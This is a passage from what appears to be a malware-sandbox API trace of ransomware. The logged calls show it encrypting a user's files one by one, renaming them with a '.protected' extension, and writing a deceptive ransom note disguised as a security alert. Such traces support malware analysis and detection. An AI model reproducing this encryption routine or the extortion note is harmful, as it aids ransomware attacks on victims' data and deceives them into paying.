lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.075] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.075] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.076] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.076] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.076] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.076] CloseHandle (hObject=0xd4) returned 1 [0091.076] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\unHbl.rtf.protected") returned 69 [0091.076] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\unHbl.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\unhbl.rtf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\unHbl.rtf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\unhbl.rtf.protected")) returned 1 [0091.077] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.077] lstrcmpiW (lpString1="wSbPKUNuyIlxN.odp", lpString2="Windows") returned 1 [0091.077] lstrcmpiW (lpString1="wSbPKUNuyIlxN.odp", lpString2="Program Files") returned 1 [0091.077] lstrcmpiW (lpString1="wSbPKUNuyIlxN.odp", lpString2="Program Files (x86)") returned 1 [0091.077] lstrcmpiW (lpString1="wSbPKUNuyIlxN.odp", lpString2="$Recycle.bin") returned 1 [0091.077] lstrcmpiW (lpString1="wSbPKUNuyIlxN.odp", lpString2="System Volume Information") returned 1 [0091.077] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wSbPKUNuyIlxN.odp") returned 67 [0091.077] StrStrIW (lpFirst="wSbPKUNuyIlxN.odp", lpSrch=".protected") returned 0x0 [0091.077] lstrcmpW (lpString1="wSbPKUNuyIlxN.odp", lpString2="RESTORE_FILES.txt") returned 1 [0091.077] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.077] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wSbPKUNuyIlxN.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wsbpkunuyilxn.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.077] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wSbPKUNuyIlxN.odp") returned 67 [0091.078] StrStrW (lpFirst="wSbPKUNuyIlxN.odp", lpSrch=".txt") returned 0x0 [0091.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wSbPKUNuyIlxN.odp") returned 67 [0091.078] StrStrW (lpFirst="wSbPKUNuyIlxN.odp", lpSrch=".rar") returned 0x0 [0091.078] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wSbPKUNuyIlxN.odp") returned 67 [0091.078] StrStrW (lpFirst="wSbPKUNuyIlxN.odp", lpSrch=".zip") returned 0x0 [0091.078] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.078] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.078] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.079] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.079] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.079] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.079] CloseHandle (hObject=0xd4) returned 1 [0091.080] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wSbPKUNuyIlxN.odp.protected") returned 77 [0091.080] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wSbPKUNuyIlxN.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wsbpkunuyilxn.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wSbPKUNuyIlxN.odp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wsbpkunuyilxn.odp.protected")) returned 1 [0091.081] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.081] lstrcmpiW (lpString1="xSv5cpFR2Yv3.png", lpString2="Windows") returned 1 [0091.081] lstrcmpiW (lpString1="xSv5cpFR2Yv3.png", lpString2="Program Files") returned 1 [0091.081] lstrcmpiW (lpString1="xSv5cpFR2Yv3.png", lpString2="Program Files (x86)") returned 1 [0091.081] lstrcmpiW (lpString1="xSv5cpFR2Yv3.png", lpString2="$Recycle.bin") returned 1 [0091.081] lstrcmpiW (lpString1="xSv5cpFR2Yv3.png", lpString2="System Volume Information") returned 1 [0091.081] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xSv5cpFR2Yv3.png") returned 66 [0091.081] StrStrIW (lpFirst="xSv5cpFR2Yv3.png", lpSrch=".protected") returned 0x0 [0091.081] lstrcmpW (lpString1="xSv5cpFR2Yv3.png", lpString2="RESTORE_FILES.txt") returned 1 [0091.081] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.081] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.081] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xSv5cpFR2Yv3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xsv5cpfr2yv3.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xSv5cpFR2Yv3.png") returned 66 [0091.082] StrStrW (lpFirst="xSv5cpFR2Yv3.png", lpSrch=".txt") returned 0x0 [0091.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xSv5cpFR2Yv3.png") returned 66 [0091.082] StrStrW (lpFirst="xSv5cpFR2Yv3.png", lpSrch=".rar") returned 0x0 [0091.082] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xSv5cpFR2Yv3.png") returned 66 [0091.082] StrStrW (lpFirst="xSv5cpFR2Yv3.png", lpSrch=".zip") returned 0x0 [0091.082] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x188e, lpOverlapped=0x0) returned 1 [0091.082] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffe772, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.082] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x188e, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x188e, lpOverlapped=0x0) returned 1 [0091.083] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.083] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.083] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.083] CloseHandle (hObject=0xd4) returned 1 [0091.084] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xSv5cpFR2Yv3.png.protected") returned 76 [0091.084] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xSv5cpFR2Yv3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xsv5cpfr2yv3.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xSv5cpFR2Yv3.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xsv5cpfr2yv3.png.protected")) returned 1 [0091.085] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.085] lstrcmpiW (lpString1="xt-_gnNqz-4llZLD.mkv", lpString2="Windows") returned 1 [0091.085] lstrcmpiW (lpString1="xt-_gnNqz-4llZLD.mkv", lpString2="Program Files") returned 1 [0091.085] lstrcmpiW (lpString1="xt-_gnNqz-4llZLD.mkv", lpString2="Program Files (x86)") returned 1 [0091.085] lstrcmpiW (lpString1="xt-_gnNqz-4llZLD.mkv", lpString2="$Recycle.bin") returned 1 [0091.085] lstrcmpiW (lpString1="xt-_gnNqz-4llZLD.mkv", lpString2="System Volume Information") returned 1 [0091.085] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xt-_gnNqz-4llZLD.mkv") returned 70 [0091.085] StrStrIW (lpFirst="xt-_gnNqz-4llZLD.mkv", lpSrch=".protected") returned 0x0 [0091.085] lstrcmpW (lpString1="xt-_gnNqz-4llZLD.mkv", lpString2="RESTORE_FILES.txt") returned 1 [0091.085] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.085] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xt-_gnNqz-4llZLD.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xt-_gnnqz-4llzld.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.086] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xt-_gnNqz-4llZLD.mkv") returned 70 [0091.086] StrStrW (lpFirst="xt-_gnNqz-4llZLD.mkv", lpSrch=".txt") returned 0x0 [0091.086] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xt-_gnNqz-4llZLD.mkv") returned 70 [0091.086] StrStrW (lpFirst="xt-_gnNqz-4llZLD.mkv", lpSrch=".rar") returned 0x0 [0091.086] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xt-_gnNqz-4llZLD.mkv") returned 70 [0091.086] StrStrW (lpFirst="xt-_gnNqz-4llZLD.mkv", lpSrch=".zip") returned 0x0 [0091.086] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.086] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.086] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.087] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.087] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.087] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.087] CloseHandle (hObject=0xd4) returned 1 [0091.088] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xt-_gnNqz-4llZLD.mkv.protected") returned 80 [0091.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xt-_gnNqz-4llZLD.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xt-_gnnqz-4llzld.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\xt-_gnNqz-4llZLD.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xt-_gnnqz-4llzld.mkv.protected")) returned 1 [0091.088] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.088] lstrcmpiW (lpString1="YJtd.bmp", lpString2="Windows") returned 1 [0091.088] lstrcmpiW (lpString1="YJtd.bmp", lpString2="Program Files") returned 1 [0091.088] lstrcmpiW (lpString1="YJtd.bmp", lpString2="Program Files (x86)") returned 1 [0091.088] lstrcmpiW (lpString1="YJtd.bmp", lpString2="$Recycle.bin") returned 1 [0091.089] lstrcmpiW (lpString1="YJtd.bmp", lpString2="System Volume Information") returned 1 [0091.089] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YJtd.bmp") returned 58 [0091.089] StrStrIW (lpFirst="YJtd.bmp", lpSrch=".protected") returned 0x0 [0091.089] lstrcmpW (lpString1="YJtd.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0091.089] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.089] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YJtd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\yjtd.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.089] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YJtd.bmp") returned 58 [0091.089] StrStrW (lpFirst="YJtd.bmp", lpSrch=".txt") returned 0x0 [0091.089] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YJtd.bmp") returned 58 [0091.089] StrStrW (lpFirst="YJtd.bmp", lpSrch=".rar") returned 0x0 [0091.089] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YJtd.bmp") returned 58 [0091.089] StrStrW (lpFirst="YJtd.bmp", lpSrch=".zip") returned 0x0 [0091.089] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.090] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.090] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.090] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.090] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.091] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.091] CloseHandle (hObject=0xd4) returned 1 [0091.091] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YJtd.bmp.protected") returned 68 [0091.091] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YJtd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\yjtd.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\YJtd.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\yjtd.bmp.protected")) returned 1 [0091.101] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.101] lstrcmpiW (lpString1="Z4lBp9.wav", lpString2="Windows") returned 1 [0091.101] lstrcmpiW (lpString1="Z4lBp9.wav", lpString2="Program Files") returned 1 [0091.101] lstrcmpiW (lpString1="Z4lBp9.wav", lpString2="Program Files (x86)") returned 1 [0091.101] lstrcmpiW (lpString1="Z4lBp9.wav", lpString2="$Recycle.bin") returned 1 [0091.101] lstrcmpiW (lpString1="Z4lBp9.wav", lpString2="System Volume Information") returned 1 [0091.101] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z4lBp9.wav") returned 60 [0091.101] StrStrIW (lpFirst="Z4lBp9.wav", lpSrch=".protected") returned 0x0 [0091.101] lstrcmpW (lpString1="Z4lBp9.wav", lpString2="RESTORE_FILES.txt") returned 1 [0091.101] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.101] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z4lBp9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\z4lbp9.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.101] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z4lBp9.wav") returned 60 [0091.102] StrStrW (lpFirst="Z4lBp9.wav", lpSrch=".txt") returned 0x0 [0091.102] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z4lBp9.wav") returned 60 [0091.102] StrStrW (lpFirst="Z4lBp9.wav", lpSrch=".rar") returned 0x0 [0091.102] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z4lBp9.wav") returned 60 [0091.102] StrStrW (lpFirst="Z4lBp9.wav", lpSrch=".zip") returned 0x0 [0091.102] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.102] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.102] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.103] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.103] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.103] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.103] CloseHandle (hObject=0xd4) returned 1 [0091.104] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z4lBp9.wav.protected") returned 70 [0091.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z4lBp9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\z4lbp9.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Z4lBp9.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\z4lbp9.wav.protected")) returned 1 [0091.105] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.105] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.105] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RESTORE_FILES.txt") returned 67 [0091.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.106] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL 